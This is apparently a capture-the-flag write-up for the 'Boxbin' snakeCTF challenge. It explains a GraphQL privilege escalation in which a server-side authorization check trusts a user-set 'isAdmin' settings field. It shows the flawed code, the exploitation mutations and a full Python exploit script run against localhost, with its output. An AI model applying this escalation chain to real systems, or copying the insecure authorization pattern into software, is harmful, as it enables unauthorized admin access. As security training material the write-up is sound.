📦 Challenge source
đź“– Introduction
Boxbin is a Next.js + GraphQL pastebin parody. The core bug is privilege escalation via trusted user-controlled settings in the GraphQL layer. By writing {"isAdmin": true}
into our own user.settings
, we satisfy the server’s isAuthorized()
check, then call privileged mutations to join the admin group and read hidden posts (flag).
Context Explanation
- Stack: Next.js API route (Apollo Server) + SQLite.
- Auth: JWT (
Authorization
header →context.user
from DB). Passwords hashed with bcrypt. - RBAC: Numeric
groupId
(admin ≤ 1). Several mutations/queries requireisAuthorized(context)
. - Flaw:
isAuthorized()
also trustsJSON.parse(user.settings).isAdmin === true
— which users can set themselves viaupdateSettings(settings: String!)
.
Key entry point (GraphQL handler):
// pages/api/graphql.js
export default startServerAndCreateNextHandler(server, {
context: async (req) => {
const token = req.headers.authorization || '';
if (token) {
const { userId } = jwt.verify(token, JWT_SECRET);
const db = await getDb();
const user = await db.get('SELECT * FROM users WHERE id = ?', userId);
return { user }; // <-- becomes context.user in resolvers
}
return { user: null };
},
});
Directive
Abuse the settings-trust + admin-only mutations chain to become admin and query hidden posts containing the flag.
🛠️ Solution
1) Vulnerable authorization logic
// lib/schema.js
function isAuthorized(context) {
if (context.user && context.user.settings) {
try {
const userSettings = JSON.parse(context.user.settings);
if (userSettings.isAdmin === true) return true; // <-- trusts user-controlled field
} catch (e) {}
}
return (context.user && context.user.groupId <= 1); // fallback: real admin groups
}
2) Attacker-controlled write primitive
Any logged-in user may store arbitrary JSON into their own settings:
// Mutation: updateSettings
updateSettings: async (_, { settings }, context) => {
if (!context.user) throw new Error('You must be logged in');
await db.run('UPDATE users SET settings = ? WHERE id = ?', settings, context.user.id);
return "Settings updated";
}
No schema/shape validation on settings
→ we can write {"isAdmin": true}
.
3) Privileged mutations gated by isAuthorized
Once isAuthorized(context)
returns true, admin-only actions unlock:
// Only allowed if isAuthorized(context) === true
updateUserGroup: async (_, { userId, groupId }, context) => {
if (!isAuthorized(context)) throw new Error("Forbidden");
await db.run('UPDATE users SET groupId = ? WHERE id = ?', groupId, userId);
return db.get('SELECT * FROM users WHERE id = ?', userId);
},
hiddenPosts: async (_, __, context) => {
if (!isAuthorized(context)) throw new Error("Forbidden");
return db.all('SELECT * FROM posts WHERE hidden = TRUE ORDER BY id DESC');
}
The app also has an “upgrade” path that changes
groupId
based on purchased upgrades:
// adminUserUpgrade (no admin required; just logged-in)
adminUserUpgrade: async (_, { upgradeId }, context) => {
const upgrade = await db.get('SELECT * FROM upgrades WHERE id = ?', upgradeId);
...
await db.run('UPDATE users SET groupId = ? WHERE id = ?', newGroupId, context.user.id);
return db.get('SELECT * FROM users WHERE id = ?', context.user.id);
}
This is not required to exploit, but the PoC uses it as a step before final escalation.
4) Exploitation flow
(a) Sign up → JWT
mutation Signup($u:String!, $p:String!) {
signup(username:$u, password:$p)
}
Use the returned JWT in Authorization:
for next steps.
(b) Buy upgrade to be able to edit settings
mutation AdminUserUpgrade { adminUserUpgrade(upgradeId: 7) { id groupId } }
(c) Become “authorized” by self-tagging as admin
mutation UpdateSettings($s:String!) {
updateSettings(settings:$s)
}
# variables: { "s": "{\"isAdmin\": true}" }
(d) Use unlocked admin mutation to set real admin group
mutation UpdateUserGroup($id:ID!, $g:Int!) {
updateUserGroup(userId:$id, groupId:$g) { id groupId }
}
# set g = 0 (admin)
(e) Read the hidden content containing the flag
query Hidden { hiddenPosts { content } }
Extract snakeCTF{...}
from the returned content.
PoC
"""
1) signup -> get JWT
2) adminUserUpgrade(upgradeId=7)
3) updateSettings('{"isAdmin": true}')
4) updateUserGroup(userId=<me>, groupId=0)
5) hiddenPosts { content } -> extract snakeCTF{...}
"""
import base64
import json
import re
import secrets
import string
import sys
from typing import Optional, Dict, Any
import requests
# ---------- Config ----------
BASE_URL = "http://localhost:3000/"
GQL_ENDPOINT = BASE_URL.rstrip("/") + "/api/graphql"
USERNAME_PREFIX = "hitcat"
PASSWORD = "Secret123!"
UPGRADE_ID = 7
ADMIN_GROUP_ID = 0
HTTP_TIMEOUT = 20
session = requests.Session()
session.headers.update({"Content-Type": "application/json"})
# ---------- Helpers ----------
def b64url_decode(s: str) -> bytes:
"""Base64URL decode with automatic padding."""
return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))
def jwt_get_user_id(token: str) -> int:
"""Extract userId from unsigned JWT (no secret needed)."""
try:
_, payload_b64, _ = token.split(".")
payload = json.loads(b64url_decode(payload_b64).decode("utf-8"))
return int(payload["userId"])
except Exception as exc:
print(f"[!] Failed to decode JWT userId: {exc}")
sys.exit(1)
def gql(query: str, variables: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""Send a GraphQL request and return the 'data' dict or exit on error."""
payload = {"query": query, "variables": variables or {}}
resp = session.post(GQL_ENDPOINT, json=payload, timeout=HTTP_TIMEOUT)
# Ensure JSON response
try:
data = resp.json()
except Exception:
print(f"[!] Non-JSON response ({resp.status_code}): {resp.text[:400]}")
sys.exit(1)
# Handle GraphQL errors
if "errors" in data:
print("[!] GraphQL errors:")
print(json.dumps(data["errors"], indent=2))
sys.exit(1)
return data["data"]
def rand_suffix(n: int = 5) -> str:
"""Random lowercase/digit suffix to avoid username collisions."""
alphabet = string.ascii_lowercase + string.digits
return "".join(secrets.choice(alphabet) for _ in range(n))
# ---------- Main chain ----------
def main() -> None:
# 1) SignUp -> JWT in data.signup
username = f"{USERNAME_PREFIX}{rand_suffix()}"
print(f"[*] Signing up as: {username}")
q_signup = """
mutation Signup($username: String!, $password: String!) {
signup(username: $username, password: $password)
}"""
d = gql(q_signup, {"username": username, "password": PASSWORD})
token = d["signup"]
print(f"[+] JWT obtained: {token}")
#Update session auth header
session.headers.update({"Authorization": token})
# Decode userId from JWT
user_id = jwt_get_user_id(token)
print(f"[+] Decoded userId from JWT: {user_id}")
# 2) adminUserUpgrade(upgradeId: 7)
print("[*] Upgrading user via adminUserUpgrade…")
q_upgrade = """
mutation AdminUserUpgrade($upgradeId: ID!) {
adminUserUpgrade(upgradeId: $upgradeId) { username }
}"""
d = gql(q_upgrade, {"upgradeId": UPGRADE_ID})
print(f"[+] adminUserUpgrade OK for user: {d['adminUserUpgrade']['username']}")
# 3) updateSettings(settings: "{\"isAdmin\":true}") – string parsed as JSON server-side
print("[*] Enabling admin via updateSettings…")
q_settings = """
mutation UpdateSettings($settings: String!) {
updateSettings(settings: $settings)
}"""
settings_str = json.dumps({"isAdmin": True}) # -> '{"isAdmin": true}'
d = gql(q_settings, {"settings": settings_str})
print(f"[+] updateSettings returned: {d['updateSettings']}")
# 4) updateUserGroup(userId: <me>, groupId: 0)
print("[*] Switching current user to admin group…")
q_group = """
mutation UpdateUserGroup($userId: ID!, $groupId: Int!) {
updateUserGroup(userId: $userId, groupId: $groupId) {
id
groupId
__typename
}
}"""
d = gql(q_group, {"userId": str(user_id), "groupId": ADMIN_GROUP_ID})
print(f"[+] updateUserGroup OK -> id={d['updateUserGroup']['id']} groupId={d['updateUserGroup']['groupId']}")
# 5) hiddenPosts { content } -> extract snakeCTF{...}
print("[*] Fetching hiddenPosts…")
q_hidden = """
query HiddenPosts {
hiddenPosts {
content
}
}"""
d = gql(q_hidden)
posts = d.get("hiddenPosts", [])
contents = "\n".join(p.get("content", "") for p in posts)
print(f"[+] Retrieved {len(posts)} hidden posts")
# Extract the flag
print("[*] Extracting flag with regex…")
# try escaped then unescaped variants
matches = re.findall(r"snakeCTF\\{[^}]+\\}", contents)
if not matches:
matches = re.findall(r"snakeCTF\{[^}]+\}", contents)
if matches:
print(f"[!] FLAG: {matches[0]}")
else:
print("[!] Flag not found in hiddenPosts content.")
print("--- hiddenPosts preview (first 500 chars) ---")
print(contents[:500])
if __name__ == "__main__":
main()
#Output
[*] Signing up as: hitcatsr4ag
[+] JWT obtained: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEwLCJpYXQiOjE3NTc1MDUyMTh9.85FN-EL3W-kXx7eMPvphbAx00EDF4zcoPJo7g2dDwlo
[+] Decoded userId from JWT: 10
[*] Upgrading user via adminUserUpgrade…
[+] adminUserUpgrade OK for user: hitcatsr4ag
[*] Enabling admin via updateSettings…
[+] updateSettings returned: Settings updated
[*] Switching current user to admin group…
[+] updateUserGroup OK -> id=10 groupId=0
[*] Fetching hiddenPosts…
[+] Retrieved 7 hidden posts
[*] Extracting flag with regex…
[!] FLAG: snakeCTF{f4ke_fl4g_f0r_t3st1ng}